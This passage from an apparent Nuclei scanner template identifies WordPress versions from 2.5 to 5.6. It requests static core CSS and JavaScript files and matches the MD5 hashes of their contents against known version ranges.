- name: 5.1 - 5.1.8 - dsl: - - "(\"ea8b083a18626a1affa3df8886b5a842\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"0e5309ea99cd90706a48953493e0ddef\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"459c552c4fed71b308d2fca0ed9ea37c\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"ffe71832a7c66be8b8df4640908d5166\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"3cd3d82b486d5783b70ed642835b69ab\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"60a49686075ee09ee6fd6672dea7e013\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/twemoji.js" - matchers: - - type: dsl - name: 4.8.2 - 4.9.2 - dsl: - - "(\"c0390599690d05b4c11e1a8b9b0fab25\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"4405b6c3e027ec84fecf1544e6a95faf\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"be2f6b80d0307857a83d0b17b9f24d2d\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"eb1a64327a54c38aedd775a04e8e0d10\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"67bccdc7434c745aa8fcd5d9f05acdf3\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.24 - dsl: - - "(\"0bc85a034468a7c4571dba2653f74fbf\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"3ee6d376cd81409dd12d29b5dfcbf385\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"c5e2468d0609ca34092c9d68466332ba\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"fc199f3337f05b3a2e6920c4b47c74d1\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.7 - dsl: - - "(\"241425f7ffff6596f2d19ced513b1f0b\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"4d33a4ad65ec90364e2c52aca8badf11\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"8a6fb9053400858374294ffde81bf81d\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"bdeb78768f3f5a5613495826ad543a69\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"c9e9b421239fdb7f771bfc8e8c74dd2b\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b9924734a6ca248128a9a04287228257\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"deaea3bc219e50b8db06022b21a078fc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/admin-menu.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"5e1349161a85839be024488a50de95b3\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"b1e6ea1aee87917ff8cac7929130e61d\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"c9fa68152543f700153462035f04ba13\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"db41a7ad18e56aa32ac88650cf65f03f\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"cdff2ab873be887ba6f04022ec98fdcb\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"833e64b0003fc66897e82fcfc7fc0121\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"5d1b42b737158c277828afda18881573\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"3c9615f3acb53ceee8340401a7939b89\" == md5(body))" - - type: dsl - name: 3.9.1 - 3.9.33 - dsl: - - "(\"e866498f734c0dcf94ea834e3fe81a83\" == md5(body))" - - type: dsl - name: 3.9 - dsl: - - "(\"734bf76b45a2a690043446ededf94b7d\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.16 - dsl: - - "(\"2b4eb0f12b5b5fb87f06528eb082b8a3\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"54c7805c00f9d4ee074fb60669e93fa7\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"4c455ba981ec9b471c7d9b0f459470ba\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"5ac558ef6bfa6308c3da00ed4c8bd467\" == md5(body))" - - type: dsl - name: 5.3 - 5.4.4 - dsl: - - "(\"8f492790e0bd47664cfc1267d3e4317f\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b823320f18dc78ca56d7b3409a90f518\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"08154f808fde723690366d2b66237597\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/thickbox/thickbox.css" - matchers: - - type: dsl - name: 4.6 - 4.8.15 - dsl: - - "(\"805aa150a391e44e3245f25ea83bdfcb\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6d9819a66083a19b6df22de32f072586\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"b904be85634530e3008e9dc4722628fb\" == md5(body))" - - type: dsl - name: 4.2 - 4.3.25 - dsl: - - "(\"255290108a1c6a8ad31f6fa1415978a7\" == md5(body))" - - type: dsl - name: 3.9 - 4.1.32 - dsl: - - "(\"87bddde1890612b32a9a4672e5d26661\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"23b4106d316474bc2a38b48a01786aac\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"b1dcb13562cf13a93d4ddf10a7c6d787\" == md5(body))" - - type: dsl - name: 3.3 - 3.4.2 - dsl: - - "(\"1b31826535373c66aeeac3fc82008024\" == md5(body))" - - type: dsl - name: 2.7.1 - 3.2.1 - dsl: - - "(\"9e2094eaecb034d8e9d3d726518aab05\" == md5(body))" - - type: dsl - name: 2.7 - dsl: - - "(\"9c2bd2be0893adbe02a0f864526734c2\" == md5(body))" - - type: dsl - name: 2.6 - 2.6.5 - dsl: - - "(\"ed2c3a3ad714f3134bc7824fadd0eeea\" == md5(body))" - - type: dsl - name: 2.5 - 2.5.1 - dsl: - - "(\"c2a19490b513519a3453915c73fa034b\" == md5(body))" - - type: dsl - name: 4.9 - 5.4.4 - dsl: - - "(\"69d6aa1f5bafc0d02da2d4470496ea12\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"5dcdcf282792663175cd2c2e8ef04f6f\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"37faeb50ef52da086e0f8c2c289e66d4\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-nav-menus.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"9b59a1a32ef52f56906579bb83f2de2e\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"0567f480faf8b31d9121fa36fc2ce535\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.3 - dsl: - - "(\"50392a954a951e46177355be44c21914\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"080248c963bb67242f323af5cab56734\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"13c05456026f6c1866db7a742e27ab13\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"5c7cc163f7382233369702a73f4ee078\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"95401f95b6dd126827e64f690a9db231\" == md5(body))" - - type: dsl - name: 4.3.2 - 4.3.25 - dsl: - - "(\"a45b939bffb49aeb3bf6ec41d32625e4\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.1 - dsl: - - "(\"6e343b576a49ade0f56fa49dc42980af\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"fec0c0c5b8e76ffaeb87d95daa4d7e74\" == md5(body))" - - type: dsl - name: 4.9.2 - 4.9.16 - dsl: - - "(\"c3d67006bc1b55274afa78df3b46f605\" == md5(body))" - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"ff497c14667947cbbe75153b587405a9\" == md5(body))" - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"e7fb504704cbc728b307fcef68bc40e0\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"75a99dd31bb764de27ea997e70ba8bc5\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"62d2c2937b42ff6236a02a39047ac0fb\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-nav-menus-rtl.min.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"642b2c1283a26c19b78b4e204064f83c\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"7a848ee830c0c5b67da1a0566c3b4ec7\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.3 - dsl: - - "(\"0aca5fc957d7d65b7dc908967df8d2c1\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"c859a7494e93d515ea023e845b862de0\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"f1a43d2195725369dac369cc3d214af6\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"498fd625f4abfedd30fa50bb86cab3d8\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"c35fd5f35a602a245565b44e15aa604b\" == md5(body))" - - type: dsl - name: 4.3.2 - 4.3.25 - dsl: - - "(\"c6cf978207c6d98f9f51d20a25f34dd2\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.1 - dsl: - - "(\"ed59d15bec63adfb0080179e64a13954\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"106881f3a4b6d0906d30ce186f0cb4db\" == md5(body))" - - type: dsl - name: 4.9.2 - 4.9.16 - dsl: - - "(\"8f104e8e20108646cb3e9c69d819f195\" == md5(body))" - - type: dsl - name: 5.0 - 5.1.8 - dsl: - - "(\"66bdd3cfa4505a15480321e0ec125d3f\" == md5(body))" - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"215fb1ca4140dd402b16a6316067064a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"5229afb1f372bcb09a21d3ef380d8abe\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d3a0abfffab24c079f3e3013ec60136d\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/customize-nav-menus.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"44f3f858820bbd8a2e0df20ed1ef0070\" == md5(body))" - - type: dsl - name: 4.7.4 - 4.7.19 - dsl: - - "(\"ac1398f94377751de7ffead484df8333\" == md5(body))" - - type: dsl - name: 4.7.1 - 4.7.3 - dsl: - - "(\"3b1a54b0ef1e4feebd577c268f3b7b56\" == md5(body))" - - type: dsl - name: 4.7 - dsl: - - "(\"2e38f00fdfff5ee896dd3f15f06cf5d3\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"b4dcd2e0e34fc54708352f0a0d9d0379\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"3a84b0aef5c73a63db74c7c7c52f0de3\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"b28a18395e56677a32339cbd7c9837dd\" == md5(body))" - - type: dsl - name: 4.3.2 - 4.3.25 - dsl: - - "(\"a0aa2c9698c701cd03da983c6d1eaa00\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.1 - dsl: - - "(\"b1f7b5e6dbe60deefaa7691e6a826633\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.1 - dsl: - - "(\"2e26ad1954acf52ef1df70ad03186873\" == md5(body))" - - type: dsl - name: 4.9.2 - 5.0.11 - dsl: - - "(\"67aad3843e4f5f4bde34a2f5c9c46aaa\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"355d4a2780e2f9b3e980ef74b7d7a146\" == md5(body))" - - type: dsl - name: 5.2 - 5.4.4 - dsl: - - "(\"e4832a345e012b47c028c8d9dfa2f3ad\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"b9cf7f8a3b56f7668afb7e9416efe5bf\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5520940066ef5b2112560bec8d606306\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/media-models.js" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"9dbd7395fac0f6f1065bd5231d14941f\" == md5(body))" - - type: dsl - name: 4.3 - 4.6.20 - dsl: - - "(\"98fa336128f3c0da0271f568a0cc05d3\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.24 - dsl: - - "(\"2e7864d513c82363a81c6eb0337bd5f2\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"f66d1ebe4decdac8163979876b0023e7\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"79e9265523a309157cf3e3346f6cdaf3\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"a6af52ebc087c3024146b96304ab5b1d\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"3848a2f1838aebf9a4ff9dba3613a712\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"0c065b544bad77fbc55a68561cf67055\" == md5(body))" - - type: dsl - name: 3.6 - 3.6.1 - dsl: - - "(\"6eb56989a9553ce89b1cd706bfa17084\" == md5(body))" - - type: dsl - name: 3.5 - 3.5.2 - dsl: - - "(\"92a5d9fdc580782fefac7329ae7c43ab\" == md5(body))" - - type: dsl - name: 4.9 - 4.9.4 - dsl: - - "(\"6d5565dfc9ef63ef9188457921c6e708\" == md5(body))" - - type: dsl - name: 4.9.5 - dsl: - - "(\"d0fbf5b6c322c1ebe3b972eea62ec894\" == md5(body))" - - type: dsl - name: 4.9.6 - 4.9.16 - dsl: - - "(\"529e91f5ac6fd14fa38d85082d4aeab4\" == md5(body))" - - type: dsl - name: 5.0 - 5.0.11 - dsl: - - "(\"42280316bc7695cce608c075247712bb\" == md5(body))" - - type: dsl - name: 5.1 - 5.2.9 - dsl: - - "(\"a5e3ef6d503193408be3c987f0bfbb9a\" == md5(body))" - - type: dsl - name: 4.2.25 - 4.2.29 - dsl: - - "(\"6462ad87157a0ff259d227e676805a15\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"5541276bc1d1608b07691b3f8c487c89\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"4c9720b69a4695c799544597419eb86a\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d4238c1112684c2150318d1d7dd0cf99\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"5f0d3d36e8489cf3ce815f2a427121d2\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/css/admin-bar-rtl.css" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"046e7e16b385ceaff66eba4956e99a8d\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"50dcb762647a492e4769ea0947b50248\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"7b8a4eb193902f3eb5321be2a1f8f39e\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"3317c4a0df48baaa87a41cfa963ef7f5\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"4cefd4ea07b52250161119b99b07c5cd\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"fbccb3a9d9e326432416170f500febe6\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"d8750588b9608c960a4c84111826363b\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"22f2a03358684885e9cfd7001df074a9\" == md5(body))" - - type: dsl - name: 4.0 - 4.0.32 - dsl: - - "(\"a4e8295dfbbffb2a1b3c15d599aa496f\" == md5(body))" - - type: dsl - name: 3.9 - 3.9.33 - dsl: - - "(\"ae164288125e6d5b18a41cd716b1e290\" == md5(body))" - - type: dsl - name: 3.8.1 - 3.8.35 - dsl: - - "(\"88af7a163758d4d5a13cf5b71e50fcac\" == md5(body))" - - type: dsl - name: 3.8 - dsl: - - "(\"20b09b48f38414802780b0e76ce0bd23\" == md5(body))" - - type: dsl - name: 3.5 - 3.7.35 - dsl: - - "(\"f581a4e8a0512e99baa8762fa1e27c4e\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"e010613db1aaafaa8897e716f3594225\" == md5(body))" - - type: dsl - name: 3.3 - 3.3.3 - dsl: - - "(\"cbcaa7ff91fc06bd6b10449306ba54f9\" == md5(body))" - - type: dsl - name: 3.2 - 3.2.1 - dsl: - - "(\"4dcd6a050acafbc397b761057d82e6ef\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.4 - dsl: - - "(\"ce3489857c05ef7d6bde38d61f8c9590\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"c2c292b337230f342125bc7488b38bcc\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"557ccfd95017d0ea81c6e9f2ec1a6e7e\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.2 - dsl: - - "(\"aefa2187af77b0f9ab7bacab3df4c0d4\" == md5(body))" - - type: dsl - name: 5.2.3 - 5.2.9 - dsl: - - "(\"9f6f6313a99bacb2e815596b354113d4\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"a8374ae13c60948627afad8d05b577f3\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"0681cef20e79f3dbdabd8dc1075ab948\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"768ff7aad2844bd7ade74814c1648bd7\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"d59ee58d4aed2e96006bf1a02e98bbec\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/format-library.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"ce6d7774d49a758b607da01c68b15a58\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"590d64772c4414fbb688f129a6c9e9af\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"859a85a0da66968152601fa5558b5b07\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"e80477b2ce0ff34ac2fc000495285bbf\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"fc5024975c3d2bc66aa6aeee06647e15\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"9f737824d948eed09dcab71a2ab98d0e\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"ecb50250c3b72af79307c863eaaaca84\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"12ae55e99484787294b80e64348c2384\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"e6173e37d837ce77fb8347e1d4a97abc\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/rich-text.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"3a06513baf497e53b0908c155f1c6013\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"2b08233d7239ada8cf8b27d302a11a5c\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"31082605f1c90333bf255157b8affcb9\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"85d06c1f54c5f65009ae0fa1fc3a2c1f\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"38e202bee269957a40daaa5fff2e98fc\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"aa5eebad40c9c789bdb3cba2e188b214\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"8476aba44d5fd7cee30353d212ebc763\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"518412e4d64f0204bb35526845a9fd19\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"33adb469a67b720074abc0260904d269\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/rich-text.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"c56b09dee53354f60d943229fd881595\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"56efbae730dff0e4ebe544f04c1bcc61\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"898c7a4af828d255f2107593c6798f61\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"2b512c31caf790a2c86921f9e5aba54a\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"f26fd86d54e406c441c32d25c2baaecd\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"69c199809f214dea6dea7019d9b4b9c1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"709e70847fcd5ee992d466b36bdd60d2\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d50cb814c9f835eaff3493862afff438\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"8b9d1f6566b1551875fc38b7438db6f6\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/dist/format-library.min.js" - matchers: - - type: dsl - name: 5.0 - 5.0.1 - dsl: - - "(\"824845d2d6081499fc7ccc4077c4eddb\" == md5(body))" - - type: dsl - name: 5.0.2 - 5.0.11 - dsl: - - "(\"dee80998f8a3f592d7bf32754e8e3017\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"306eb481911cf7709eb0b2df94cfc1fd\" == md5(body))" - - type: dsl - name: 5.2 - dsl: - - "(\"1d0c1f96a2bab8bf8444a4a2518c8e40\" == md5(body))" - - type: dsl - name: 5.2.1 - 5.2.9 - dsl: - - "(\"0356b70777d0a101a52316e7223b6802\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"a2a8f2e8d8364cfe0c1f70b88947adfb\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"94ff59822055a2299ea5747e6a090f6c\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"d13511a6298af519aa0b799be66f9a9d\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"12b59bd77e0a1f316057732f428e6f41\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-includes/js/twemoji.min.js" - matchers: - - type: dsl - name: 4.8.2 - 4.9.2 - dsl: - - "(\"116aad1318ef7f049d2f2429faf670b4\" == md5(body))" - - type: dsl - name: 4.8 - 4.8.1 - dsl: - - "(\"dd5f53451b94fbbe3145f7987159a24c\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"467ef54bff10851a04064eebc9837d52\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"975227e3cbc1876e05bbb107da05fc81\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6e0cefd4871c11ce6bf3d55f83cae0d3\" == md5(body))" - - type: dsl - name: 4.4.1 - 4.4.24 - dsl: - - "(\"8ad73e167829a12b8a553070dd6a05e8\" == md5(body))" - - type: dsl - name: 4.4 - dsl: - - "(\"446ab329d408aa69da0e448298a039f4\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"9cfd48e37348e36a3caa072318531b08\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"b47c1841005ed6866cd72c7fc2b74d46\" == md5(body))" - - type: dsl - name: 4.9.3 - 4.9.7 - dsl: - - "(\"a149011cef16cee2fe0507a94b71d466\" == md5(body))" - - type: dsl - name: 4.9.8 - 5.0.11 - dsl: - - "(\"47008e6186dfd2a8ea800d7d17158824\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"d25e686696ccc15195ecc70858f8e9c5\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"bcfb47f222286294b85658e5c48271b8\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"bd911c47ffa6cebe9968e2c5c81af2c1\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"c7b682cf436f591d75807356c449c254\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"dc7d6410824e50cb301d3b5736ecae9e\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"aab18f118a004009b60e0daef478df74\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/js/user-profile.js" - matchers: - - type: dsl - name: 4.8 - 4.8.15 - dsl: - - "(\"21a263cec51227aa5501116b190d2e49\" == md5(body))" - - type: dsl - name: 4.7 - 4.7.19 - dsl: - - "(\"c5f95e8f9ced3d06d137ec7f5a12de5a\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"258b8ad98219b15241bf340eb0f2dbce\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"c5faef1bebb47add41bc6b9d8123e5cf\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"658938d60803a1b5937727713fe5c445\" == md5(body))" - - type: dsl - name: 4.3.1 - 4.3.25 - dsl: - - "(\"d7ef7731b4b5a97befab69565fdc2929\" == md5(body))" - - type: dsl - name: 4.3 - dsl: - - "(\"e97fed4b3c06493ab6d1a3d15408ab15\" == md5(body))" - - type: dsl - name: 4.2 - 4.2.29 - dsl: - - "(\"28090921c47b8aab172ab53dcc269d00\" == md5(body))" - - type: dsl - name: 4.1 - 4.1.32 - dsl: - - "(\"c2bcc33ea5397b37fc77de3149618d9f\" == md5(body))" - - type: dsl - name: 3.9 - 4.0.32 - dsl: - - "(\"2b68876c91544e9d82a545409171468f\" == md5(body))" - - type: dsl - name: 3.8 - 3.8.35 - dsl: - - "(\"1f700cd405416317d2d97379c21c7c3c\" == md5(body))" - - type: dsl - name: 3.7 - 3.7.35 - dsl: - - "(\"9e703dc5d5f400b0b22e2fcf6c3da6e8\" == md5(body))" - - type: dsl - name: 3.5 - 3.6.1 - dsl: - - "(\"9a55eb19b2ba406d0c446494f5082362\" == md5(body))" - - type: dsl - name: 3.4 - 3.4.2 - dsl: - - "(\"8d2bdb3746a32cf6584131f1cf8862e9\" == md5(body))" - - type: dsl - name: 3.1.4 - 3.3.3 - dsl: - - "(\"55b400c3c8a9e0dd988b23e0f04a54e3\" == md5(body))" - - type: dsl - name: 3.1 - 3.1.3 - dsl: - - "(\"530bc21feaa9a66288243dd56266dbbe\" == md5(body))" - - type: dsl - name: 3.0 - 3.0.6 - dsl: - - "(\"dc2668c5f95d07ede878842297184ba3\" == md5(body))" - - type: dsl - name: 2.8 - 2.9.2 - dsl: - - "(\"6f264365c799d04bf353784315b3541e\" == md5(body))" - - type: dsl - name: 4.9 - 5.0.11 - dsl: - - "(\"7e8a197f4aec099d481cc4b4dfcc0a21\" == md5(body))" - - type: dsl - name: 5.1 - 5.1.8 - dsl: - - "(\"1ce6b01fe41dbab94964a8818de75d06\" == md5(body))" - - type: dsl - name: 5.2 - 5.2.9 - dsl: - - "(\"6a893ff35450bbcd3f7a16f390dde7e5\" == md5(body))" - - type: dsl - name: 5.3 - 5.3.6 - dsl: - - "(\"415a0ae2d0ac703d2570ed209e058118\" == md5(body))" - - type: dsl - name: 5.4 - 5.4.4 - dsl: - - "(\"7436086296cefbd1254594fac9cfb5a7\" == md5(body))" - - type: dsl - name: 5.5 - 5.5.3 - dsl: - - "(\"f3fb0ce780fdba51eac8410bff1f10ca\" == md5(body))" - - type: dsl - name: 5.6 - dsl: - - "(\"ec61c3334afd91d00ef2ae64cf535743\" == md5(body))" - - method: GET - path: - - "{{BaseURL}}/wp-admin/css/admin-menu-rtl.css" - matchers: - - type: dsl - name: 4.7 - 4.8.15 - dsl: - - "(\"4df6af8d274c9c84f00995c4b06b8668\" == md5(body))" - - type: dsl - name: 4.6 - 4.6.20 - dsl: - - "(\"dc74b14f3d25a91e399b6f613fe11223\" == md5(body))" - - type: dsl - name: 4.5 - 4.5.23 - dsl: - - "(\"6c35e5396302ef3514598cbf3b2f9947\" == md5(body))" - - type: dsl - name: 4.4 - 4.4.24 - dsl: - - "(\"a560d2a2be816bcbf121c4b2adeaf615\" == md5(body))" - - type: dsl - name: 4.3 - 4.3.25 - dsl: - - "(\"e3708169a620043b2c2bad64b0092b7e\" 